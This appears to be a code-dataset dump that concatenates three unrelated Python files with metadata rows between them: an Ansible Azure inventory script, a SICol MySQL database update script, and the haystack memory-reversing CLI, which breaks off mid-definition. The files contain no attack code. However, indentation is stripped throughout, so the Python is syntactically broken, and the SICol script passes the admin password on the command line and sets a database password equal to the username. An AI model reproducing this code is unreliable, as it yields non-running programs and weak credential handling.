# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
'''
Azure External Inventory Script
===============================
Generates dynamic inventory by making API requests to the Azure Resource
Manager using the Azure Python SDK. For instruction on installing the
Azure Python SDK see http://azure-sdk-for-python.readthedocs.org/
Authentication
--------------
The order of precedence is command line arguments, environment variables,
and finally the [default] profile found in ~/.azure/credentials.
If using a credentials file, it should be an ini formatted file with one or
more sections, which we refer to as profiles. The script looks for a
[default] section, if a profile is not specified either on the command line
or with an environment variable. The keys in a profile will match the
list of command line arguments below.
For command line arguments and environment variables specify a profile found
in your ~/.azure/credentials file, or a service principal or Active Directory
user.
Command line arguments:
- profile
- client_id
- secret
- subscription_id
- tenant
- ad_user
- password
Environment variables:
- AZURE_PROFILE
- AZURE_CLIENT_ID
- AZURE_SECRET
- AZURE_SUBSCRIPTION_ID
- AZURE_TENANT
- AZURE_AD_USER
- AZURE_PASSWORD
Run for Specific Host
-----------------------
When run for a specific host using the --host option, a resource group is
required. For a specific host, this script returns the following variables:
{
"ansible_host": "XXX.XXX.XXX.XXX",
"computer_name": "computer_name2",
"fqdn": null,
"id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Compute/virtualMachines/object-name",
"image": {
"offer": "CentOS",
"publisher": "OpenLogic",
"sku": "7.1",
"version": "latest"
},
"location": "westus",
"mac_address": "00-00-5E-00-53-FE",
"name": "object-name",
"network_interface": "interface-name",
"network_interface_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkInterfaces/object-name1",
"network_security_group": null,
"network_security_group_id": null,
"os_disk": {
"name": "object-name",
"operating_system_type": "Linux"
},
"plan": null,
"powerstate": "running",
"private_ip": "172.26.3.6",
"private_ip_alloc_method": "Static",
"provisioning_state": "Succeeded",
"public_ip": "XXX.XXX.XXX.XXX",
"public_ip_alloc_method": "Static",
"public_ip_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/publicIPAddresses/object-name",
"public_ip_name": "object-name",
"resource_group": "galaxy-production",
"security_group": "object-name",
"security_group_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkSecurityGroups/object-name",
"tags": {
"db": "database"
},
"type": "Microsoft.Compute/virtualMachines",
"virtual_machine_size": "Standard_DS4"
}
Groups
------
When run in --list mode, instances are grouped by the following categories:
- azure
- location
- resource_group
- security_group
- tag key
- tag key_value
Control groups using azure_rm.ini or set environment variables:
AZURE_GROUP_BY_RESOURCE_GROUP=yes
AZURE_GROUP_BY_LOCATION=yes
AZURE_GROUP_BY_SECURITY_GROUP=yes
AZURE_GROUP_BY_TAG=yes
Select hosts within specific resource groups by assigning a comma separated list to:
AZURE_RESOURCE_GROUPS=resource_group_a,resource_group_b
Select hosts for specific tag key by assigning a comma separated list of tag keys to:
AZURE_TAGS=key1,key2,key3
Select hosts for specific locations:
AZURE_LOCATIONS=eastus,westus,eastus2
Or, select hosts for specific tag key:value pairs by assigning a comma separated list key:value pairs to:
AZURE_TAGS=key1:value1,key2:value2
If you don't need the powerstate, you can improve performance by turning off powerstate fetching:
AZURE_INCLUDE_POWERSTATE=no
azure_rm.ini
------------
As mentioned above, you can control execution using environment variables or a .ini file. A sample
azure_rm.ini is included. The name of the .ini file is the basename of the inventory script (in this case
'azure_rm') with a .ini extension. It also assumes the .ini file is alongside the script. To specify
a different path for the .ini file, define the AZURE_INI_PATH environment variable:
export AZURE_INI_PATH=/path/to/custom.ini
Powerstate:
-----------
The powerstate attribute indicates whether or not a host is running. If the value is 'running', the machine is
up. If the value is anything other than 'running', the machine is down, and will be unreachable.
Examples:
---------
Execute /bin/uname on all instances in the galaxy-qa resource group
$ ansible -i azure_rm.py galaxy-qa -m shell -a "/bin/uname -a"
Use the inventory script to print instance specific information
$ contrib/inventory/azure_rm.py --host my_instance_host_name --pretty
Use with a playbook
$ ansible-playbook -i contrib/inventory/azure_rm.py my_playbook.yml --limit galaxy-qa
Insecure Platform Warning
-------------------------
If you receive InsecurePlatformWarning from urllib3, install the
requests security packages:
pip install requests[security]
author:
- Chris Houseknecht (@chouseknecht)
- Matt Davis (@nitzmahone)
Company: Ansible by Red Hat
Version: 1.0.0
'''
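# A minimal ~/.azure/credentials profile, sketched from the argument names
# listed in the docstring above (all values are placeholders):
#
#   [default]
#   subscription_id=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#   client_id=my-application-id
#   secret=my-client-secret
#   tenant=my-tenant-id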
import argparse
import ConfigParser
import json
import os
import re
import sys
from packaging.version import Version
from os.path import expanduser
HAS_AZURE = True
HAS_AZURE_EXC = None
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.compute import __version__ as azure_compute_version
from azure.common import AzureMissingResourceHttpError, AzureHttpError
from azure.common.credentials import ServicePrincipalCredentials, UserPassCredentials
from azure.mgmt.network.network_management_client import NetworkManagementClient
from azure.mgmt.resource.resources.resource_management_client import ResourceManagementClient
from azure.mgmt.compute.compute_management_client import ComputeManagementClient
except ImportError as exc:
HAS_AZURE_EXC = exc
HAS_AZURE = False
AZURE_CREDENTIAL_ENV_MAPPING = dict(
profile='AZURE_PROFILE',
subscription_id='AZURE_SUBSCRIPTION_ID',
client_id='AZURE_CLIENT_ID',
secret='AZURE_SECRET',
tenant='AZURE_TENANT',
ad_user='AZURE_AD_USER',
password='AZURE_PASSWORD'
)
AZURE_CONFIG_SETTINGS = dict(
resource_groups='AZURE_RESOURCE_GROUPS',
tags='AZURE_TAGS',
locations='AZURE_LOCATIONS',
include_powerstate='AZURE_INCLUDE_POWERSTATE',
group_by_resource_group='AZURE_GROUP_BY_RESOURCE_GROUP',
group_by_location='AZURE_GROUP_BY_LOCATION',
group_by_security_group='AZURE_GROUP_BY_SECURITY_GROUP',
group_by_tag='AZURE_GROUP_BY_TAG'
)
AZURE_MIN_VERSION = "0.30.0rc5"
def azure_id_to_dict(id):
pieces = re.sub(r'^\/', '', id).split('/')
result = {}
index = 0
while index < len(pieces) - 1:
result[pieces[index]] = pieces[index + 1]
index += 1
return result
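    # For illustration (hypothetical id): '/subscriptions/abc/resourceGroups/rg1'
    # yields {'subscriptions': 'abc', 'abc': 'resourceGroups', 'resourceGroups': 'rg1'};
    # every adjacent pair is mapped, so lookups like result['resourceGroups'] work.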
class AzureRM(object):
def __init__(self, args):
self._args = args
self._compute_client = None
self._resource_client = None
self._network_client = None
self.debug = False
if args.debug:
self.debug = True
self.credentials = self._get_credentials(args)
if not self.credentials:
self.fail("Failed to get credentials. Either pass as parameters, set environment variables, "
"or define a profile in ~/.azure/credentials.")
if self.credentials.get('subscription_id', None) is None:
self.fail("Credentials did not include a subscription_id value.")
self.log("setting subscription_id")
self.subscription_id = self.credentials['subscription_id']
if self.credentials.get('client_id') is not None and \
self.credentials.get('secret') is not None and \
self.credentials.get('tenant') is not None:
self.azure_credentials = ServicePrincipalCredentials(client_id=self.credentials['client_id'],
secret=self.credentials['secret'],
tenant=self.credentials['tenant'])
elif self.credentials.get('ad_user') is not None and self.credentials.get('password') is not None:
self.azure_credentials = UserPassCredentials(self.credentials['ad_user'], self.credentials['password'])
else:
self.fail("Failed to authenticate with provided credentials. Some attributes were missing. "
"Credentials must include client_id, secret and tenant or ad_user and password.")
def log(self, msg):
if self.debug:
print(msg + u'\n')
def fail(self, msg):
raise Exception(msg)
def _get_profile(self, profile="default"):
path = expanduser("~")
path += "/.azure/credentials"
try:
config = ConfigParser.ConfigParser()
config.read(path)
except Exception as exc:
self.fail("Failed to access {0}. Check that the file exists and you have read "
"access. {1}".format(path, str(exc)))
credentials = dict()
for key in AZURE_CREDENTIAL_ENV_MAPPING:
try:
credentials[key] = config.get(profile, key, raw=True)
except:
pass
if credentials.get('client_id') is not None or credentials.get('ad_user') is not None:
return credentials
return None
def _get_env_credentials(self):
env_credentials = dict()
for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items():
env_credentials[attribute] = os.environ.get(env_variable, None)
if env_credentials['profile'] is not None:
credentials = self._get_profile(env_credentials['profile'])
return credentials
if env_credentials['client_id'] is not None or env_credentials['ad_user'] is not None:
return env_credentials
return None
def _get_credentials(self, params):
# Get authentication credentials.
        # Precedence: cmd line parameters -> environment variables -> default profile in ~/.azure/credentials.
self.log('Getting credentials')
arg_credentials = dict()
for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items():
arg_credentials[attribute] = getattr(params, attribute)
# try module params
if arg_credentials['profile'] is not None:
self.log('Retrieving credentials with profile parameter.')
credentials = self._get_profile(arg_credentials['profile'])
return credentials
if arg_credentials['client_id'] is not None:
self.log('Received credentials from parameters.')
return arg_credentials
# try environment
env_credentials = self._get_env_credentials()
if env_credentials:
self.log('Received credentials from env.')
return env_credentials
        # try default profile from ~/.azure/credentials
default_credentials = self._get_profile()
if default_credentials:
self.log('Retrieved default profile credentials from ~/.azure/credentials.')
return default_credentials
return None
def _register(self, key):
try:
# We have to perform the one-time registration here. Otherwise, we receive an error the first
# time we attempt to use the requested client.
resource_client = self.rm_client
resource_client.providers.register(key)
except Exception as exc:
self.log("One-time registration of {0} failed - {1}".format(key, str(exc)))
self.log("You might need to register {0} using an admin account".format(key))
self.log(("To register a provider using the Python CLI: "
"https://docs.microsoft.com/azure/azure-resource-manager/"
"resource-manager-common-deployment-errors#noregisteredproviderfound"))
@property
def network_client(self):
self.log('Getting network client')
if not self._network_client:
self._network_client = NetworkManagementClient(self.azure_credentials, self.subscription_id)
self._register('Microsoft.Network')
return self._network_client
@property
def rm_client(self):
self.log('Getting resource manager client')
if not self._resource_client:
self._resource_client = ResourceManagementClient(self.azure_credentials, self.subscription_id)
return self._resource_client
@property
def compute_client(self):
self.log('Getting compute client')
if not self._compute_client:
self._compute_client = ComputeManagementClient(self.azure_credentials, self.subscription_id)
self._register('Microsoft.Compute')
return self._compute_client
class AzureInventory(object):
def __init__(self):
self._args = self._parse_cli_args()
try:
rm = AzureRM(self._args)
except Exception as e:
sys.exit("{0}".format(str(e)))
self._compute_client = rm.compute_client
self._network_client = rm.network_client
self._resource_client = rm.rm_client
self._security_groups = None
self.resource_groups = []
self.tags = None
self.locations = None
self.replace_dash_in_groups = False
self.group_by_resource_group = True
self.group_by_location = True
self.group_by_security_group = True
self.group_by_tag = True
self.include_powerstate = True
self._inventory = dict(
_meta=dict(
hostvars=dict()
),
azure=[]
)
self._get_settings()
if self._args.resource_groups:
self.resource_groups = self._args.resource_groups.split(',')
if self._args.tags:
self.tags = self._args.tags.split(',')
if self._args.locations:
self.locations = self._args.locations.split(',')
if self._args.no_powerstate:
self.include_powerstate = False
self.get_inventory()
print(self._json_format_dict(pretty=self._args.pretty))
sys.exit(0)
def _parse_cli_args(self):
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory file for an Azure subscription')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--debug', action='store_true', default=False,
help='Send debug messages to STDOUT')
parser.add_argument('--host', action='store',
help='Get all information about an instance')
parser.add_argument('--pretty', action='store_true', default=False,
help='Pretty print JSON output(default: False)')
parser.add_argument('--profile', action='store',
help='Azure profile contained in ~/.azure/credentials')
parser.add_argument('--subscription_id', action='store',
help='Azure Subscription Id')
parser.add_argument('--client_id', action='store',
help='Azure Client Id ')
parser.add_argument('--secret', action='store',
help='Azure Client Secret')
parser.add_argument('--tenant', action='store',
help='Azure Tenant Id')
parser.add_argument('--ad-user', action='store',
help='Active Directory User')
parser.add_argument('--password', action='store',
help='password')
parser.add_argument('--resource-groups', action='store',
help='Return inventory for comma separated list of resource group names')
parser.add_argument('--tags', action='store',
help='Return inventory for comma separated list of tag key:value pairs')
parser.add_argument('--locations', action='store',
help='Return inventory for comma separated list of locations')
parser.add_argument('--no-powerstate', action='store_true', default=False,
help='Do not include the power state of each virtual host')
return parser.parse_args()
def get_inventory(self):
if len(self.resource_groups) > 0:
# get VMs for requested resource groups
for resource_group in self.resource_groups:
try:
virtual_machines = self._compute_client.virtual_machines.list(resource_group)
except Exception as exc:
sys.exit("Error: fetching virtual machines for resource group {0} - {1}".format(resource_group,
str(exc)))
if self._args.host or self.tags:
selected_machines = self._selected_machines(virtual_machines)
self._load_machines(selected_machines)
else:
self._load_machines(virtual_machines)
else:
# get all VMs within the subscription
try:
virtual_machines = self._compute_client.virtual_machines.list_all()
except Exception as exc:
sys.exit("Error: fetching virtual machines - {0}".format(str(exc)))
if self._args.host or self.tags or self.locations:
selected_machines = self._selected_machines(virtual_machines)
self._load_machines(selected_machines)
else:
self._load_machines(virtual_machines)
def _load_machines(self, machines):
for machine in machines:
id_dict = azure_id_to_dict(machine.id)
# TODO - The API is returning an ID value containing resource group name in ALL CAPS. If/when it gets
# fixed, we should remove the .lower(). Opened Issue
# #574: https://github.com/Azure/azure-sdk-for-python/issues/574
resource_group = id_dict['resourceGroups'].lower()
if self.group_by_security_group:
self._get_security_groups(resource_group)
host_vars = dict(
ansible_host=None,
private_ip=None,
private_ip_alloc_method=None,
public_ip=None,
public_ip_name=None,
public_ip_id=None,
public_ip_alloc_method=None,
fqdn=None,
location=machine.location,
name=machine.name,
type=machine.type,
id=machine.id,
tags=machine.tags,
network_interface_id=None,
network_interface=None,
resource_group=resource_group,
mac_address=None,
plan=(machine.plan.name if machine.plan else None),
virtual_machine_size=machine.hardware_profile.vm_size,
computer_name=(machine.os_profile.computer_name if machine.os_profile else None),
provisioning_state=machine.provisioning_state,
)
host_vars['os_disk'] = dict(
name=machine.storage_profile.os_disk.name,
operating_system_type=machine.storage_profile.os_disk.os_type.value
)
if self.include_powerstate:
host_vars['powerstate'] = self._get_powerstate(resource_group, machine.name)
if machine.storage_profile.image_reference:
host_vars['image'] = dict(
offer=machine.storage_profile.image_reference.offer,
publisher=machine.storage_profile.image_reference.publisher,
sku=machine.storage_profile.image_reference.sku,
version=machine.storage_profile.image_reference.version
)
# Add windows details
if machine.os_profile is not None and machine.os_profile.windows_configuration is not None:
host_vars['windows_auto_updates_enabled'] = \
machine.os_profile.windows_configuration.enable_automatic_updates
host_vars['windows_timezone'] = machine.os_profile.windows_configuration.time_zone
host_vars['windows_rm'] = None
if machine.os_profile.windows_configuration.win_rm is not None:
host_vars['windows_rm'] = dict(listeners=None)
if machine.os_profile.windows_configuration.win_rm.listeners is not None:
host_vars['windows_rm']['listeners'] = []
for listener in machine.os_profile.windows_configuration.win_rm.listeners:
host_vars['windows_rm']['listeners'].append(dict(protocol=listener.protocol,
certificate_url=listener.certificate_url))
for interface in machine.network_profile.network_interfaces:
interface_reference = self._parse_ref_id(interface.id)
network_interface = self._network_client.network_interfaces.get(
interface_reference['resourceGroups'],
interface_reference['networkInterfaces'])
if network_interface.primary:
if self.group_by_security_group and \
self._security_groups[resource_group].get(network_interface.id, None):
host_vars['security_group'] = \
self._security_groups[resource_group][network_interface.id]['name']
host_vars['security_group_id'] = \
self._security_groups[resource_group][network_interface.id]['id']
host_vars['network_interface'] = network_interface.name
host_vars['network_interface_id'] = network_interface.id
host_vars['mac_address'] = network_interface.mac_address
for ip_config in network_interface.ip_configurations:
host_vars['private_ip'] = ip_config.private_ip_address
host_vars['private_ip_alloc_method'] = ip_config.private_ip_allocation_method
if ip_config.public_ip_address:
public_ip_reference = self._parse_ref_id(ip_config.public_ip_address.id)
public_ip_address = self._network_client.public_ip_addresses.get(
public_ip_reference['resourceGroups'],
public_ip_reference['publicIPAddresses'])
host_vars['ansible_host'] = public_ip_address.ip_address
host_vars['public_ip'] = public_ip_address.ip_address
host_vars['public_ip_name'] = public_ip_address.name
host_vars['public_ip_alloc_method'] = public_ip_address.public_ip_allocation_method
host_vars['public_ip_id'] = public_ip_address.id
if public_ip_address.dns_settings:
host_vars['fqdn'] = public_ip_address.dns_settings.fqdn
self._add_host(host_vars)
def _selected_machines(self, virtual_machines):
selected_machines = []
for machine in virtual_machines:
if self._args.host and self._args.host == machine.name:
selected_machines.append(machine)
if self.tags and self._tags_match(machine.tags, self.tags):
selected_machines.append(machine)
if self.locations and machine.location in self.locations:
selected_machines.append(machine)
return selected_machines
def _get_security_groups(self, resource_group):
''' For a given resource_group build a mapping of network_interface.id to security_group name '''
if not self._security_groups:
self._security_groups = dict()
if not self._security_groups.get(resource_group):
self._security_groups[resource_group] = dict()
for group in self._network_client.network_security_groups.list(resource_group):
if group.network_interfaces:
for interface in group.network_interfaces:
self._security_groups[resource_group][interface.id] = dict(
name=group.name,
id=group.id
)
def _get_powerstate(self, resource_group, name):
try:
vm = self._compute_client.virtual_machines.get(resource_group,
name,
expand='instanceview')
except Exception as exc:
sys.exit("Error: fetching instanceview for host {0} - {1}".format(name, str(exc)))
return next((s.code.replace('PowerState/', '')
for s in vm.instance_view.statuses if s.code.startswith('PowerState')), None)
def _add_host(self, vars):
host_name = self._to_safe(vars['name'])
resource_group = self._to_safe(vars['resource_group'])
security_group = None
if vars.get('security_group'):
security_group = self._to_safe(vars['security_group'])
if self.group_by_resource_group:
if not self._inventory.get(resource_group):
self._inventory[resource_group] = []
self._inventory[resource_group].append(host_name)
if self.group_by_location:
if not self._inventory.get(vars['location']):
self._inventory[vars['location']] = []
self._inventory[vars['location']].append(host_name)
if self.group_by_security_group and security_group:
if not self._inventory.get(security_group):
self._inventory[security_group] = []
self._inventory[security_group].append(host_name)
self._inventory['_meta']['hostvars'][host_name] = vars
self._inventory['azure'].append(host_name)
if self.group_by_tag and vars.get('tags'):
for key, value in vars['tags'].items():
safe_key = self._to_safe(key)
safe_value = safe_key + '_' + self._to_safe(value)
if not self._inventory.get(safe_key):
self._inventory[safe_key] = []
if not self._inventory.get(safe_value):
self._inventory[safe_value] = []
self._inventory[safe_key].append(host_name)
self._inventory[safe_value].append(host_name)
def _json_format_dict(self, pretty=False):
# convert inventory to json
if pretty:
return json.dumps(self._inventory, sort_keys=True, indent=2)
else:
return json.dumps(self._inventory)
def _get_settings(self):
# Load settings from the .ini, if it exists. Otherwise,
# look for environment values.
file_settings = self._load_settings()
if file_settings:
for key in AZURE_CONFIG_SETTINGS:
if key in ('resource_groups', 'tags', 'locations') and file_settings.get(key):
values = file_settings.get(key).split(',')
if len(values) > 0:
setattr(self, key, values)
elif file_settings.get(key):
val = self._to_boolean(file_settings[key])
setattr(self, key, val)
else:
env_settings = self._get_env_settings()
for key in AZURE_CONFIG_SETTINGS:
                if key in ('resource_groups', 'tags', 'locations') and env_settings.get(key):
values = env_settings.get(key).split(',')
if len(values) > 0:
setattr(self, key, values)
elif env_settings.get(key, None) is not None:
val = self._to_boolean(env_settings[key])
setattr(self, key, val)
def _parse_ref_id(self, reference):
response = {}
keys = reference.strip('/').split('/')
for index in range(len(keys)):
if index < len(keys) - 1 and index % 2 == 0:
response[keys[index]] = keys[index + 1]
return response
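        # For illustration (hypothetical reference): unlike azure_id_to_dict above,
        # only even-indexed segments become keys, so '/subscriptions/abc/resourceGroups/rg1'
        # maps to {'subscriptions': 'abc', 'resourceGroups': 'rg1'}.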
def _to_boolean(self, value):
if value in ['Yes', 'yes', 1, 'True', 'true', True]:
result = True
elif value in ['No', 'no', 0, 'False', 'false', False]:
result = False
else:
result = True
return result
def _get_env_settings(self):
env_settings = dict()
for attribute, env_variable in AZURE_CONFIG_SETTINGS.items():
env_settings[attribute] = os.environ.get(env_variable, None)
return env_settings
def _load_settings(self):
basename = os.path.splitext(os.path.basename(__file__))[0]
default_path = os.path.join(os.path.dirname(__file__), (basename + '.ini'))
path = os.path.expanduser(os.path.expandvars(os.environ.get('AZURE_INI_PATH', default_path)))
config = None
settings = None
try:
config = ConfigParser.ConfigParser()
config.read(path)
except:
pass
if config is not None:
settings = dict()
for key in AZURE_CONFIG_SETTINGS:
try:
settings[key] = config.get('azure', key, raw=True)
except:
pass
return settings
def _tags_match(self, tag_obj, tag_args):
'''
Return True if the tags object from a VM contains the requested tag values.
:param tag_obj: Dictionary of string:string pairs
        :param tag_args: List of strings in the form key:value
:return: boolean
'''
if not tag_obj:
return False
matches = 0
for arg in tag_args:
arg_key = arg
arg_value = None
if re.search(r':', arg):
arg_key, arg_value = arg.split(':')
if arg_value and tag_obj.get(arg_key, None) == arg_value:
matches += 1
elif not arg_value and tag_obj.get(arg_key, None) is not None:
matches += 1
if matches == len(tag_args):
return True
return False
def _to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be used as Ansible groups '''
regex = "[^A-Za-z0-9\_"
if not self.replace_dash_in_groups:
regex += "\-"
return re.sub(regex + "]", "_", word)
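        # For illustration (hypothetical tag): _to_safe('my tag:value') returns
        # 'my_tag_value'; dashes are kept unless replace_dash_in_groups is set.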
def main():
if not HAS_AZURE:
sys.exit("The Azure python sdk is not installed (try `pip install 'azure>=2.0.0rc5' --upgrade`) - {0}".format(HAS_AZURE_EXC))
if Version(azure_compute_version) < Version(AZURE_MIN_VERSION):
sys.exit("Expecting azure.mgmt.compute.__version__ to be {0}. Found version {1} "
"Do you have Azure >= 2.0.0rc5 installed? (try `pip install 'azure>=2.0.0rc5' --upgrade`)".format(AZURE_MIN_VERSION, azure_compute_version))
AzureInventory()
if __name__ == '__main__':
main()
|
gpl-3.0
| 7,014,954,423,921,944,000
| 39.834165
| 157
| 0.602156
| false
| 4.268639
| true
| false
| false
|
cria/microSICol
|
update_external_db.py
|
1
|
6512
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author:Renato Arnellas Coelho renatoac at gmail dot com
#
# Script to update Sicol database
#
# Warning:
# 1 - Add MySQL executable directory to system's PATH environment variable
# 2 - This script _MUST_ be executed on root directory
def updateDB(full_mode=True):
'''
full_mode = whether to update only DB structure (False) or all possible data (True)
@return bool - True = OK! False = Error found
'''
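  # For illustration (hypothetical credentials): each dump below is loaded with
  # a shell call of the form
  #   mysql -hlocalhost -uroot -psecret < <cwd>/db/scripts/v123/mysql_script_empty.sql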
import getpass
import os
import platform
from sys import exit
print "Updating MySQL database..."
if platform.system() == "Windows" or platform.system() == "Microsoft":
import winsound
####################
# User data
####################
dados = {}
dados['mysql_login'] = raw_input("MySQL administrator login: ")
dados['mysql_pwd'] = getpass.getpass("MySQL administrator password: ")
dados['mysql_bd'] = raw_input("MySQL Database (e.g. 'sicol_v123'): ")
dados['mysql_user'] = raw_input("Sicol login to MySQL (e.g. 'sicol'): ")
####################
# Internal data
####################
sicol_path = os.getcwd()+os.sep+'db'+os.sep+'scripts'+os.sep
if platform.system() == "Windows" or platform.system() == "Microsoft":
mysql_path = [x for x in os.environ['PATH'].split(";") if x.lower().find('mysql') != -1]
else: #UNIX
pipe = os.popen("which mysql") #grab where MySQL is installed
mysql_path = pipe.read().strip()
host = "localhost"
user = dados['mysql_login']
pwd = dados['mysql_pwd']
####################
# DB update script
####################
if mysql_path == '' or mysql_path == []:
print "*********** ERROR ***********"
print "Please insert path to executable directory (mysql.exe) in OS 'PATH' variable."
raw_input() #Wait for user input...
return False
else:
if platform.system() == "Windows" or platform.system() == "Microsoft":
#Ignore whether PATH ends with '\' or not
mysql_path = mysql_path[0]
if mysql_path[-1] != '\\': mysql_path += '\\'
mysql_path = '"' + mysql_path + 'mysql.exe"'
try:
bd_version = dados['mysql_bd'].split("_")[1]
except Exception,e:
print "*********** ERROR ***********"
print "Please type \"sicol_v###\" where ### = version number."
raw_input() #Wait for user input...
return False
path_to_db = sicol_path + bd_version + os.sep
# Load mysql_script_empty.sql
dump_file = 'mysql_script_empty.sql'
print "Loading database structure..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
#return False
# Load mysql_start_dump.sql
dump_file = "dump"+os.sep+"mysql_start_dump.sql"
print "Loading initial dump to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return False
######################
# Load additional data
######################
if full_mode:
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load test data? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_testdata_dump.sql
dump_file = "dump"+os.sep+"mysql_testdata_dump.sql"
print "Loading test data to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load all Brazilian cities name to database? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_cities_dump.sql
dump_file = "dump"+os.sep+"mysql_cities_dump.sql"
print "Loading Brazilian cities name to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load debug data? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_cities_dump.sql
dump_file = "dump"+os.sep+"mysql_debug_dump.sql"
print "Loading debug data to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
########################
# End of additional data
########################
# Give database permissions to "sicol" user
print "Transfering access permission to user \"%s\"..." % dados['mysql_user']
try:
#Create temp file in order to change user permissions
f = open('temp_user_access_bd.sql','w')
f.write("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@localhost IDENTIFIED BY '%s';FLUSH PRIVILEGES;" % (dados['mysql_bd'].replace("_","\\_"),dados['mysql_user'],dados['mysql_user']))
f.close()
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,os.getcwd()+os.sep+'temp_user_access_bd.sql') )
os.unlink('temp_user_access_bd.sql')
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
####################
# End of update
####################
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONEXCLAMATION)
print "****************************"
raw_input("Update finished. Press [ENTER] to continue.")
#If this script is called locally...
if __name__ == "__main__":
print "*** Update SICol Database ***"
updateDB()
print "*** Update Finished ***"
|
gpl-2.0
| 2,520,255,957,991,356,000
| 38.447205
| 181
| 0.555129
| false
| 3.465673
| false
| false
| false
|
trolldbois/python-haystack-reverse
|
haystack/reverse/cli.py
|
1
|
4337
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
"""Entry points related to reverse. """
import os
import sys
from haystack import argparse_utils
from haystack import cli
from haystack.reverse import api
# the description of the function
REVERSE_DESC = 'Reverse the data structure from the process memory'
REVERSE_SHOW_DESC = 'Show the record at a specific address'
REVERSE_PARENT_DESC = 'List the predecessors pointing to the record at this address'
REVERSE_HEX_DESC = 'Show the Hex values for the record at that address.'
def show_hex(args):
""" Show the Hex values for the record at that address. """
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
st = ctx.get_record_at_address(args.address)
print(repr(st.bytes))
except ValueError as e:
print(None)
return
def show_predecessors_cmdline(args):
"""
Show the predecessors that point to a record at a particular address.
:param args: cmdline args
:return:
"""
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
child_record = ctx.get_record_at_address(args.address)
except ValueError as e:
print(None)
return
records = api.get_record_predecessors(memory_handler, child_record)
if len(records) == 0:
print(None)
else:
for p_record in records:
print('#0x%x\n%s\n' % (p_record.address, p_record.to_string()))
return
def reverse_show_cmdline(args):
""" Show the record at a specific address. """
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
st = ctx.get_record_at_address(args.address)
print(st.to_string())
except ValueError:
print(None)
return
def reverse_cmdline(args):
""" Reverse """
from haystack.reverse import api as rapi
# get the memory handler adequate for the type requested
memory_handler = cli.make_memory_handler(args)
# do the search
rapi.reverse_instances(memory_handler)
return
def reverse():
argv = sys.argv[1:]
desc = REVERSE_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.set_defaults(func=reverse_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_show():
argv = sys.argv[1:]
desc = REVERSE_SHOW_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, help='Record memory address in hex')
rootparser.set_defaults(func=reverse_show_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_parents():
argv = sys.argv[1:]
desc = REVERSE_PARENT_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None,
help='Hex address of the child structure')
rootparser.set_defaults(func=show_predecessors_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_hex():
